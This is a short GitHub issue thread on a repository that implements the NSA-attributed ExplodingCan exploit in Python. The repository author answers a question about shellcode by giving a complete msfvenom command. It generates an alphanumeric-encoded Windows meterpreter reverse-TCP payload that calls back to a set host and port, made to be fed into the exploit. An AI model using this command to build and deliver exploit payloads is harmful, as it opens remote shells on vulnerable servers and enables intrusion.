danigargu / explodingcan

An implementation of NSA's ExplodingCan exploit in Python
261 stars 61 forks source link

Shellcode #1

Closed ghost closed 6 years ago

ghost commented 6 years ago

How to generate shellcode file?

danigargu commented 6 years ago

The shellcode must be in alphanumeric format due to the limitations of the bug. e.g. with Metasploit:

msfvenom -p windows/meterpreter/reverse_tcp -f raw -v sc -e x86/alpha_mixed LHOST=172.16.20.1 LPORT=4444

I will add it to README.md, thanks!

ghost commented 6 years ago

Thanks :+1: